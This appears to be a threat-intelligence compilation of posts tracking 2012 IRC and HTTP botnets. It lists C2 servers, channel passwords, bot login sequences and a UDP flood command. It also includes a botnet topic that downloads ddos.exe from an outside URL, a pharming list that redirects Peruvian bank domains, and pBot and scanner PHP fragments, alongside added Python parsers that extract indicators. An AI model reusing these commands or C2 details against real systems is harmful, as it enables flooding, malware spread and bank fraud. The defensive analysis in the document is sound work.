Resolved techmanagement.info to 174.36.138.26
Andromeda server: techmanagement.info
Gate file: /image.php
Plugins: Socks (dl.dropbox.com/u/37821967/s.pack)
Hosting info: http://whois.domaintools.com/176.31.208.106
tv.zabetwo.com (IRC botnet hosted in China: Hefei, Chinanet Anhui Province Network)
Resolved tv.zabetwo.com to 60.172.229.56
Server: tv.zabetwo.com
Port: 3324
Server password (PASS): eee
Nick: lbaauf
Channel: #ng (channel password: ng00)
Channel: #us
Other channels: #!, #Ma, #i
Hosting info: http://whois.domaintools.com/60.172.229.56
178.18.19.153 (IRC botnet hosted in the United States, United Fibermax Networks Bv)
Server: 178.18.19.153
Port: 6969
Channel: #iRoot
Opers: Rogue, Boss
Nick format: [Break-BoT-XP-USA]935862
USB spreading report from a bot:
[Break-BoT-XP-ARG]356431: [FeVeR-USB] Infected With a FeVeR F:
Version command and reply:
Rogue: @version
[Break-BoT-XP-ESP]467870: ..:: iRooT Modded by Break: v1.0 -::..
UDP flood command and reply (the bot echoes the target, port and delay it was given):
Rogue: @udp 199.101.48.142 80 0 25000
[Break-BoT-XP-ESP]467870: [UDP]: FeVeR Flooding 199.101.48.142, On TeH PoRT: 80, WiTH A MoFKN DeLaY Of:
irc.infctd.biz (IRC botnet hosted in Sweden: Stockholm, Portlane Networks AB)
Resolved irc.infctd.biz to 46.246.93.77
Server: irc.infctd.biz
Port: 6667
Login sequence sent by the bot:
NICK [skank]5926101
USER nxmnrwy 0 0 :[skank]5926101
USERHOST [skank]5926101
MODE [skank]5926101 -x
JOIN #deneme101010
Topic for #deneme101010 (the download command every bot receives on join): !dl http://mgtrading.org/ddos.exe c:/ddos.exe 1
Topic set by: voLwy
Hosting info: http://whois.domaintools.com/46.246.93.77
sp.3p.kz (IRC botnet hosted in the Netherlands: Haarlem, Fiberring B.V.)
Resolved sp.3p.kz to 87.255.51.229
Server: sp.3p.kz
Port: 5050
Login sequence sent by the bot:
NICK n[USA|XP]0314676
USER x "" "x" :x
JOIN #cash
Hosting info: http://whois.domaintools.com/87.255.51.229
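The handshakes above are raw IRC protocol lines (PASS, NICK, USER, JOIN, then a topic that doubles as the command queue). The following parser is an added example, not part of this post: it splits RFC 1459 messages into prefix, command and parameters, records the nick, server password and channel keys the bot uses, and pulls the !dl / @udp style commands and URLs out of channel topics. The capture it runs on is constructed from the posts above; the server prefixes (irc.infctd.biz, Rogue!op@c2.example) and the 333 line are assumed for illustration.

```python
"""Parse captured IRC C2 traffic: login details, channels and topic commands."""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"\b(?:hxxps?|https?)://\S+", re.IGNORECASE)
# A bot command starts with ! or @ at the start of a word (so 'a@b' is not one)
CMD_RE = re.compile(r"(?<!\S)[!@][A-Za-z]\w*")


@dataclass
class IrcMessage:
    prefix: str        # "" for client-to-server lines
    command: str       # e.g. "NICK", "JOIN", "332"
    params: list       # middle params plus the trailing param, if any


def parse_irc_line(line):
    """Split one RFC 1459 line. The trailing parameter (after the first ' :')
    may contain spaces, so it is cut off before the rest is split."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    command = params.pop(0).upper() if params else ""
    return IrcMessage(prefix, command, params)


def split_topic_commands(topic):
    """A topic can carry several commands ('!mdns URL !up URL hash');
    each runs from its !/@ word to the next one."""
    starts = [m.start() for m in CMD_RE.finditer(topic)]
    cmds = []
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(topic)
        parts = topic[start:end].split()
        cmds.append((parts[0], parts[1:]))
    return cmds


def extract_c2_iocs(lines):
    iocs = {"server_password": None, "nick": None, "channels": {},
            "topics": {}, "commands": [], "urls": []}
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "PASS" and msg.params:
            iocs["server_password"] = msg.params[0]
        elif msg.command == "NICK" and msg.params:
            iocs["nick"] = msg.params[0]
        elif msg.command == "JOIN" and msg.params:
            # JOIN #chan[,#chan2] [key[,key2]]: the key is the channel password
            chans = msg.params[0].split(",")
            keys = msg.params[1].split(",") if len(msg.params) > 1 else []
            for i, chan in enumerate(chans):
                iocs["channels"][chan] = keys[i] if i < len(keys) else None
        elif msg.command in ("332", "TOPIC") and len(msg.params) >= 2:
            # 332 = RPL_TOPIC (nick, chan, topic) on join;
            # TOPIC (chan, topic) when an oper changes it live
            chan, topic = msg.params[-2], msg.params[-1]
            iocs["topics"][chan] = topic
            for name, args in split_topic_commands(topic):
                iocs["commands"].append((chan, name, args))
            for url in URL_RE.findall(topic):
                if url not in iocs["urls"]:
                    iocs["urls"].append(url)
    return iocs


# Constructed sample capture, modelled on the handshakes in the posts above
SAMPLE_CAPTURE = [
    "PASS eee",
    "NICK [skank]5926101",
    "USER nxmnrwy 0 0 :[skank]5926101",
    "MODE [skank]5926101 -x",
    "JOIN #deneme101010",
    ":irc.infctd.biz 332 [skank]5926101 #deneme101010 "
    ":!dl http://mgtrading.org/ddos.exe c:/ddos.exe 1",
    ":irc.infctd.biz 333 [skank]5926101 #deneme101010 voLwy 1352650000",
    "JOIN #ng ng00",
    ":Rogue!op@c2.example TOPIC #ng :@udp 199.101.48.142 80 0 25000",
]

if __name__ == "__main__":
    for key, value in extract_c2_iocs(SAMPLE_CAPTURE).items():
        print(key, value)
```

Feeding it a real capture (one line per message, server replies included) gives the same record the posts above were written from: server password, nick pattern, channel keys, and the payload URLs to block or pull for analysis.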
PitBull CreW StableScanner
Found these hackers today while looking for online users on one board. The files are encrypted, but not hard to decrypt; here you go. This is the "Response CMD" page the scanner expects a compromised host to serve back:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
// ex() is the scanner's command-execution helper; its definition is not in this excerpt.
// If `id` returns a uid line (Unix) or `net start` mentions Windows, commands run
// on this host, so the page reports that safe mode is off.
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
tuntu.info (ngrBot IRC botnet hosted in the United States: Miami, ServerGrove)
Resolved tuntu.info to 69.195.198.208
Server: tuntu.info
Port: 5487
Channel: #zrl
Channel password: filtro
* Topic for #zrl is: !mdns http://freebookclubs.com/thumb/demo/host.txt !up hxxp://www.cesarfelipe.com.br//wp-content/themes/sakura/upd.exe EC62971A5CE3FE7DB74BBA3E5D1568D6
* Topic for #zrl set by dexter at Sun Nov 11 17:11:54 2012
Contents of host.txt (one "name target-IP" pair per line; every bank domain, and one IP address, is pointed at 38.109.219.132):
www.bbvabancocontinental.com 38.109.219.132
bbvabancocontinental.com 38.109.219.132
www.bbvacontinental.com 38.109.219.132
bbvacontinental.com 38.109.219.132
www.bbvacontinental.pe 38.109.219.132
bbvacontinental.pe 38.109.219.132
148.244.45.125 38.109.219.132
www.bn.com.pe 38.109.219.132
bn.com.pe 38.109.219.132
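The host.txt above is a pharming list: every name resolves to the same address, and bank domains are the only thing in it. The script below is an added example (not from this post or from the bot) that parses that list format, groups it by target address to show which registrable domains are being sent to one IP, and then scans a hosts file for entries pointing at the same sink, which is the check you would run on a machine suspected of being an ngrBot victim. The redirect list is the one quoted above; the hosts file content and the SECOND_LEVEL table are constructed assumptions.

```python
"""Analyse an ngrBot-style redirect list (one 'name target-IP' pair per line,
as delivered via !mdns) and check a hosts file for the same sink addresses."""
import ipaddress
from collections import defaultdict

# Labels that act as a second level under a two-letter ccTLD (com.pe, co.uk, ...);
# a short constructed table, not a full public-suffix list
SECOND_LEVEL = {"com", "net", "org", "gob", "gov", "edu", "co"}


def parse_redirect_list(text):
    """Return (name, target_ip) pairs; lines that are not exactly one name and
    one valid IPv4 address are ignored."""
    pairs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        name, target = parts
        try:
            ipaddress.IPv4Address(target)
        except ValueError:
            continue
        pairs.append((name.lower(), target))
    return pairs


def is_ip(name):
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def registrable_domain(name):
    """Crude eTLD+1: www.bn.com.pe -> bn.com.pe, www.bbvacontinental.pe -> bbvacontinental.pe."""
    labels = name.split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in SECOND_LEVEL:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def summarise(pairs):
    """Group by target IP: which registrable domains go there, and which entries
    have an IP address instead of a name on the left-hand side."""
    grouped = defaultdict(lambda: {"domains": set(), "ip_overrides": set()})
    for name, target in pairs:
        if is_ip(name):
            grouped[target]["ip_overrides"].add(name)
        else:
            grouped[target]["domains"].add(registrable_domain(name))
    return {ip: {"domains": sorted(v["domains"]),
                 "ip_overrides": sorted(v["ip_overrides"])}
            for ip, v in grouped.items()}


def pharming_sinks(summary, min_domains=2):
    """One address answering for several unrelated domains is the pharming sink."""
    return sorted(ip for ip, v in summary.items()
                  if len(v["domains"]) >= min_domains or v["ip_overrides"])


def suspicious_hosts_entries(hosts_text, sink_ips):
    """Scan a hosts file (address first, then names) for lines whose address is
    a known sink. Comments and blank lines are skipped."""
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr in sink_ips:
            hits.append((addr, names))
    return hits


# The host.txt quoted in the post above
REDIRECT_LIST = """www.bbvabancocontinental.com 38.109.219.132
bbvabancocontinental.com 38.109.219.132
www.bbvacontinental.com 38.109.219.132
bbvacontinental.com 38.109.219.132
www.bbvacontinental.pe 38.109.219.132
bbvacontinental.pe 38.109.219.132
148.244.45.125 38.109.219.132
www.bn.com.pe 38.109.219.132
bn.com.pe 38.109.219.132
"""

# Constructed hosts file from a hypothetical infected machine
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1 localhost
38.109.219.132 www.bbvacontinental.pe bbvacontinental.pe
38.109.219.132 www.bn.com.pe   # added by the bot
10.0.0.5 intranet.example
"""

if __name__ == "__main__":
    summary = summarise(parse_redirect_list(REDIRECT_LIST))
    sinks = pharming_sinks(summary)
    print("sinks:", sinks, summary)
    print("hosts hits:", suspicious_hosts_entries(SAMPLE_HOSTS, set(sinks)))
```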
Autoit Survey Winlocker
I found this while looking at the files that the Barracuda HTTP bots were downloading. First screen: CPA gateway. The only survey leads to a parked domain, so my computer is locked forever. The winlocker is coded in AutoIt, so I decompiled it to an AutoIt script, here: http://pastebin.com/ayK5QsVD The important parts are the three HTML
Multiple Barracuda HTTP nets (hosted in the Russian Federation: Moscow, Pallada Web Service LLC)
URLs:
r00kiehttp.no-ip.info
rabbit801.no-ip.org
drhawks.no-ip.org
pooostealer.no-ip.org
To see what command is currently being sent, append this to the end of the domain:
/bot.php?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7
The command will show up in plain text on the page.
Hosting info: http://whois.domaintools.com/37.0.123.113
One other on different hosting: watchshopper.no-ip.org/backup/
Hosting info: http://whois.domaintools.com/91.217.178.192
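The gate only keys on the four query parameters (ip, os, name, id), which is why a made-up check-in returns the live command. The following is an added example, not code from the post or from the bot: it builds a check-in URL of that shape for any gate base (including the /backup/ variant), and the same shape is turned into a detection that runs over proxy log lines and reports which internal host checked in to which gate. The log format ("timestamp source method url") and the log lines are constructed; the gate hostnames are the ones listed above.

```python
"""Build a Barracuda-style gate check-in URL and hunt for check-ins in proxy logs."""
import re
from urllib.parse import parse_qs, quote, urlencode, urlsplit

REQUIRED = ("ip", "os", "name", "id")


def build_checkin_url(gate_base, ip="0.0.0.0", os_name="Microsoft Windows xp",
                      name="FBI-PC", bot_id="Federal-Agent-1.3.3.7"):
    """gate_base is 'http://host' or 'http://host/backup'. quote (not quote_plus)
    gives %20 for spaces, matching what the bot itself sends."""
    query = urlencode({"ip": ip, "os": os_name, "name": name, "id": bot_id},
                      quote_via=quote)
    return gate_base.rstrip("/") + "/bot.php?" + query


def classify_request(url):
    """Return the bot's self-reported fields if url is a gate check-in
    (any path ending in bot.php carrying all four parameters), else None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/bot.php"):
        return None
    q = parse_qs(parts.query)
    if not all(k in q for k in REQUIRED):
        return None
    return {"gate": parts.netloc, "path": parts.path,
            **{k: q[k][0] for k in REQUIRED}}


# Constructed log format: "<timestamp> <source ip> <method> <url>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def find_checkins(log_lines):
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        info = classify_request(m.group("url"))
        if info:
            hits.append({"ts": m.group("ts"), "src": m.group("src"), **info})
    return hits


# Constructed proxy log: two check-ins, one benign request, one near-miss
SAMPLE_LOG = [
    "2012-11-12T10:01:02 10.0.0.7 GET http://r00kiehttp.no-ip.info/bot.php"
    "?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7",
    "2012-11-12T10:01:03 10.0.0.9 GET http://www.example.com/index.php?id=1",
    "2012-11-12T10:01:04 10.0.0.9 GET http://shop.example/bot.php?page=1",
    "2012-11-12T10:01:05 10.0.0.12 GET http://watchshopper.no-ip.org/backup/bot.php"
    "?ip=10.0.0.12&os=Windows%207&name=DESKTOP-1&id=abc",
]

if __name__ == "__main__":
    print(build_checkin_url("http://r00kiehttp.no-ip.info"))
    for hit in find_checkins(SAMPLE_LOG):
        print(hit)
```

All five gates sit on no-ip dynamic DNS names, so in practice the detection is paired with a watch on those names rather than on the addresses, which rotate.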
58.225.75.155 (100 Linux bots hosted in Korea, Republic of: Seoul, Hanaro Telecom Inc.)
I'm pasting the whole script; the server and port are inside:

<?php
set_time_limit( 0 );
error_reporting( 0 );
ignore_user_abort(true);
echo "Success!";

class pBot {
    // false: the config values below are plaintext; true would mean they are base64 encoded
    var $using_encode = false;
    var $config = array(
        'server' => '58.225.75.155', //server here (base64)
        'port' => 9999,
        'chan' => 'machine', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"
        // the rest of the configuration and the bot's methods are cut off in this excerpt
    );
}
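Since pBot keeps its C2 settings in a PHP array, and can store them base64 encoded when $using_encode is true, a small extractor saves opening every sample by hand. The script below is an added example, not from the post or from pBot itself: it reads the server, port and channel out of the source, decodes the string values when the encode flag is set, and prepends the "#" the comment says the bot adds to the channel name. The first sample is the excerpt above; the second, with encoding turned on, is constructed.

```python
"""Pull the C2 settings out of pBot PHP source, decoding base64 values when
the sample has $using_encode = true."""
import base64
import re

# 'key' => 'value'  or  'key' => 1234
KV_RE = re.compile(r"""['"](?P<key>\w+)['"]\s*=>\s*(?:['"](?P<str>[^'"]*)['"]|(?P<num>\d+))""")
ENCODE_RE = re.compile(r"\$using_encode\s*=\s*(true|false)", re.IGNORECASE)


def extract_pbot_config(php_source):
    m = ENCODE_RE.search(php_source)
    encoded = bool(m) and m.group(1).lower() == "true"
    cfg = {}
    for kv in KV_RE.finditer(php_source):
        key = kv.group("key")
        if kv.group("num") is not None:
            cfg[key] = int(kv.group("num"))
            continue
        val = kv.group("str")
        if encoded and val:
            try:
                val = base64.b64decode(val, validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                pass  # not valid base64 text: keep the raw value
        cfg[key] = val
    # the config comment says the channel is given without "#"; the bot adds it
    if cfg.get("chan") and not cfg["chan"].startswith("#"):
        cfg["chan"] = "#" + cfg["chan"]
    return cfg


# The excerpt quoted in the post above
PBOT_EXCERPT = r"""<?php
set_time_limit( 0 ); error_reporting( 0 ); ignore_user_abort(true); echo "Success!";
class pBot {
    var $using_encode = false;
    var $config = array(
        'server' => '58.225.75.155', //server here (base64)
        'port' => 9999,
        'chan' => 'machine', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"
"""

# Constructed variant of the same config with the base64 option switched on
ENCODED_SAMPLE = r"""<?php
class pBot {
    var $using_encode = true;
    var $config = array(
        'server' => 'NTguMjI1Ljc1LjE1NQ==',
        'port' => 9999,
        'chan' => 'bWFjaGluZQ==',
"""

if __name__ == "__main__":
    print(extract_pbot_config(PBOT_EXCERPT))
    print(extract_pbot_config(ENCODED_SAMPLE))
```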